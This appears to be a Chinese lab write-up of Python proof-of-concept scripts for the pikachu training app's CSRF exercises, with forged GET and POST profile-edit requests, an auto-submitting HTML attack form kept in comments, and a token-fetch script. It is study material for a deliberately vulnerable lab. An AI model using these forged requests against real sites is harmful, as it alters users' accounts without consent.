pikachu自编CSRF(GET),CSRF(POST),CSRF(token)
#与get相似,只是修改了一些请求方式
#token 版本多了一道防线:除了随请求自动附带的 Cookie 之外,提交时还必须原样带回表单页里下发的 token;跨站页面拿不到这个 token(浏览器不允许它读取受害者的页面内容),所以两个条件缺一不可。下面的脚本是拿着受害者的 Cookie 先读出 token 再提交,只能用来验证 token 校验确实生效,并不代表绕过。
自编CSRF(GET),
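"""CSRF (GET) proof-of-concept against the pikachu csrf_get lab.

Builds the link a victim would have to open, then *simulates* the victim by
issuing that same GET with the victim's session cookie attached.  Attaching
the cookie by hand only stands in for the browser sending it automatically;
the real cross-site vector is the crafted URL printed below.
"""
import requests
from urllib.parse import urlencode

target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php"
# Read back afterwards to see whether the profile was actually modified.
check_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfget/csrf_get.php"

# Fields of the profile-edit form; "add" carries the marker string checked for later.
payload = {
    "sex": "girl",
    "phonenum": "123456",
    "add": "CSRF执行成功",
    "email": "123.COM",
    "submit": "submit",
}

# Seconds to wait for the lab host; without a timeout an unreachable host hangs the script forever.
TIMEOUT = 10

# urlencode() turns the dict into a query string so it can be appended to the URL.
query_str = urlencode(payload)
alert_target = target_url + "?" + query_str
print(f"需要发送给用户的链接为:{alert_target}")

# --- simulate the victim opening the crafted link ---
# The victim's session cookie is hard-coded purely for the lab.  A real attacker
# never sees this value; the victim's browser attaches it on its own.
headers = {
    "Cookie": "PHPSESSID=df0u2o787mgfgc0avf392ksd7g",
}
edit_resp = requests.get(target_url, params=payload, headers=headers, timeout=TIMEOUT)
edit_resp.raise_for_status()  # a wrong host/path should fail loudly, not report a false "done"

resp = requests.get(check_url, headers=headers, timeout=TIMEOUT)
resp.raise_for_status()
print("[+] 注入完成 ")
# The marker from payload["add"] showing up on the profile page means the write landed.
print("[+] 检查注入是否成功: ", "CSRF执行成功" in resp.text)

# ---- CSRF(POST) ----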
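"""CSRF (POST) proof-of-concept against the pikachu csrf_post lab.

Same idea as the GET variant, only the submission method differs.  A POST form
cannot be triggered by a bare link, so the real cross-site vector would be an
auto-submitting HTML form on an attacker page; this script skips that step and
simply replays the POST with the victim's session cookie attached.
"""
import requests

target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php"
# Read back afterwards to see whether the profile was actually modified.
get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post.php"

# Fields of the profile-edit form; "phonenum" is the value checked for later.
payload = {
    "sex": "girl",
    "phonenum": "123456",
    "add": "CSRF的POST攻击",
    "email": "qq.com",
    "submit": "submit",
}

# Seconds to wait for the lab host; without a timeout an unreachable host hangs the script forever.
TIMEOUT = 10

# --- simulate the victim's browser submitting the form ---
# The victim's session cookie is hard-coded purely for the lab; the browser
# would attach it automatically.
headers = {
    "Cookie": "PHPSESSID=49mmcmofpdtoh0vn7jvkoj13r2",
}

# The original also built a requests.Session() that was never used; plain calls suffice.
edit_resp = requests.post(target_url, data=payload, headers=headers, timeout=TIMEOUT)
edit_resp.raise_for_status()  # a wrong host/path should fail loudly, not report a false "done"

resp = requests.get(get_url, headers=headers, timeout=TIMEOUT)
resp.raise_for_status()
print("[+] 攻击完成 ")
# The phone number we submitted appearing on the profile page means the write landed.
if "123456" in resp.text:
    print("[+] 查看是否注入成功! ")
else:
    print("[-] 注入失败 !")

# ---- CSRF(token) ----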
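"""CSRF (token) walkthrough against the pikachu csrf_token lab.

The token variant adds a second requirement on top of the session cookie: the
edit request must echo back the token embedded in the edit form.  A cross-site
page gets the cookie for free (the browser attaches it) but cannot read the
token out of the victim's page, so the auto-submitting form from the POST lab
no longer works on its own.

This script therefore does NOT demonstrate a bypass.  It fetches the token
*with the victim's session cookie* -- something only someone who already holds
that cookie can do -- and then replays the edit.  Treat it as a check that the
token is enforced, not as evidence that it can be beaten.

A GET-style attack link for this lab would be built exactly as in the GET lab:
``evil_url = target_url + "?" + urlencode(payload)``.
"""
import re

import requests

# Cross-site delivery page from the POST lab, kept for reference.  It has no
# way to supply the per-session token, which is exactly why it is not used here.
# html = '''
# <form action="http://192.168.8.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
# <input type="hidden" name="sex" value="girl">
# <input type="hidden" name="phonenum" value="123456">
# <input type="hidden" name="add" value="CSRF-POST">
# <input type="hidden" name="email" value="123@qq.com">
# <input type="hidden" name="submit" value="submit">
# </form>
# <script>document.forms[0].submit()</script>
# '''
# with open("CSRF_token.html", "w", encoding="utf-8") as f:
#     f.write(html)
# print("[+] 攻击脚本已写好CSRF_token.html")

# --- assume the victim's session is in hand ---
target_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get_edit.php"
# Read back afterwards to see whether the profile was actually modified.
get_url = "http://192.168.8.1/pikachu-master/vul/csrf/csrftoken/token_get.php"

# Seconds to wait for the lab host; without a timeout an unreachable host hangs the script forever.
TIMEOUT = 10

# Victim's session cookie, hard-coded for the lab.  Holding it is what makes
# the token readable below; a real cross-site attacker does not have it.
headers = {
    "Cookie": "PHPSESSID=if9t2mbpc5c5rf83p1slcn7748",
}

session = requests.Session()
session.get(get_url, headers=headers, timeout=TIMEOUT)

# The token is rendered into the edit form as a hidden input; pull it out of the page.
target_get = session.get(url=target_url, headers=headers, timeout=TIMEOUT)
target_get.raise_for_status()
match = re.search(r'name="token" value="(.*?)"', target_get.text)
if match is None:
    # The original called .group(1) unguarded and died with an AttributeError here.
    raise SystemExit("[-] 页面中未找到 token,无法继续")
token = match.group(1)
print(f"[+] 已获取实时Token:{token}")

payload = {
    "sex": "girl",
    "phonenum": "123456",
    "add": "CSRF-token",
    "email": "321@qq.com",
    "token": token,
    "submit": "submit",
}

# Submit the edit as a GET with query parameters, the same way the GET lab does:
# the endpoint is token_get_edit.php and the docstring's attack link is a GET
# URL.  The original sent a POST body and then a parameter-less GET, so the
# payload never travelled as query parameters at all.
# NOTE(review): if this endpoint turns out to read POST fields only, change
# this one call to session.post(target_url, data=payload, headers=headers, timeout=TIMEOUT).
edit_resp = session.get(target_url, params=payload, headers=headers, timeout=TIMEOUT)
edit_resp.raise_for_status()

resp = session.get(url=get_url, headers=headers, timeout=TIMEOUT)
resp.raise_for_status()
print("[+] 注入成功")
# The marker from payload["add"] showing up on the profile page means the write landed.
print("[+] 检查测是否正常注入: ", "CSRF-token" in resp.text)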